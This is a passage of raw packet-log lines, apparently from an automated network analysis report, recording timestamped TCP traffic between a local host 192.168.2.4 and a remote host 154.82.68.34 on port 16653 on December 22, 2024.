                                      Dec 22, 2024 08:37:06.459244013 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.459295988 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.460355043 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.460422993 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.460458040 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.460510015 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.461574078 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.461632013 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.461711884 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.461767912 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.462791920 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.462852955 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.462995052 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.463047028 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.464015007 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.464068890 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.464190960 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.464241982 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.465246916 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.465300083 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.465359926 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.465409994 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.466473103 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.466528893 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.466603994 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.466658115 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.467696905 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.467760086 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.467833996 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.467889071 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.468914032 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.468978882 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.469047070 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.469105005 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.470180035 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.470242977 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.470448971 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.470503092 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.471370935 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.471434116 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.471438885 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.471487045 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.472615957 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.472686052 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.472732067 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.472786903 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.473839045 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.473913908 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.474076033 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.474131107 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.475049019 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.475105047 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.475178957 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.475228071 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.476289988 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.476353884 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.476421118 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.476476908 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.477498055 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.477556944 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.477631092 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.477682114 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.478796959 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.478858948 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.478892088 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.478959084 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.479964018 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.480025053 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.480091095 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.480150938 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.481189966 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.481260061 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.481260061 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.481313944 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.482409000 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.482465982 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.482528925 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.482589006 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.483639002 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.483697891 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.483784914 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.483833075 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.575987101 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.576075077 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.576134920 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.576189041 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.576622009 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.576673031 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.576802969 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.576853037 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.577878952 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.577930927 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.578366041 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.578418970 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.579205036 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.579267025 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.612626076 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.612683058 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.612699032 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.612720013 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.612740993 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.612765074 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.612807035 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.612842083 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.612855911 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.612879038 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.612889051 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.612924099 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.615732908 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.615786076 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.615786076 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.615823984 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.615838051 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.615860939 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.615879059 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.615896940 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.615909100 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.615938902 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.615978003 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.615978003 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.616923094 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.616981983 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.617055893 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.617108107 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.618129969 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.618205070 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.618252993 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.618298054 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.619357109 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.619407892 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.619672060 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.619721889 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.620582104 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.620636940 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.620701075 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.620758057 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.621809006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.621861935 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.621949911 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.622000933 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.623059988 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.623109102 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.623194933 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.623250961 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.624273062 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.624342918 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.624473095 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.624524117 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.625725031 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.625777960 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.625850916 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.625900984 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.627116919 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.627182007 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.627187967 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.627240896 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.628252029 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.628309011 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.628314972 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.628365040 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.629273891 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.629328012 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.629427910 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.629482031 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.630559921 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.630611897 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.630614042 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.630667925 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.632210970 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.632281065 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.632318974 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.632370949 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.632847071 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.632903099 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.633075953 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.633126974 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.634197950 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.634253979 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.634373903 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.634421110 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.635327101 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.635374069 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.635385036 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.635427952 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.636547089 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.636595964 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.636723995 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.636768103 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.637898922 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.637947083 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.644730091 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.644781113 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.644798040 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.644829035 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.644984007 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.645025969 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.645147085 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.645195007 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.646272898 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.646307945 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.646326065 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.646352053 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.647454023 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.647505999 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.647586107 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.647635937 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.648700953 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.648750067 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.648931026 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.648973942 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.650409937 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.650465965 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.650533915 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.650579929 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.651433945 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.651500940 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.651573896 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.651627064 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.652472019 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.652523994 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.652575970 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.652623892 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.653701067 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.653764963 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.653791904 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.653848886 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.654791117 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.654844999 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.654911041 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.654969931 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.656127930 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.656179905 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.656322002 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.656369925 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.657229900 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.657284975 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.657356024 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.657402992 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.658509970 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.658560991 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.658632994 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.658679962 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.659749031 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.659800053 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.659869909 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.659915924 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.660918951 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.660974026 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.661040068 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.661084890 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.662143946 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.662195921 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.662475109 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.662520885 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.663367033 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.663410902 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.663484097 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.663522005 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.664654970 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.664705038 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.664719105 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.664746046 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.665829897 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.665879011 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.665939093 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.665983915 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.667165041 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.667224884 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.667253017 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.667298079 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.668452978 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.668504953 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.668526888 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.668574095 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.669482946 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.669539928 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.669625044 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.669673920 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.670730114 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.670779943 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.670783997 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.670825005 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.671998024 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.672050953 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.672050953 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.672100067 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.673173904 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.673223972 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.673259020 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.673302889 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.674422979 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.674468040 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.674547911 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.674596071 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.675677061 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.675734043 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.675856113 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.675900936 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.768379927 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.768485069 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.768565893 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.768991947 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.769051075 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.769109964 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.769165039 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.770142078 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.770198107 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.770263910 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.770314932 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.771357059 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.771414995 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.802541971 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.802640915 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.802645922 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.802695036 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.803190947 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.803253889 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.803261042 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.803303957 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.804371119 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.804421902 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.804424047 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.804466963 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.805675983 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.805720091 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.805866003 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.805913925 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.806879997 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.806929111 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.806965113 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.807008982 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.808049917 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.808099985 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.808176994 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.808232069 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.809298992 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.809349060 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.809410095 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:06.809457064 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:06.810484886 CET1665349730154.82.68.34192.168.2.4
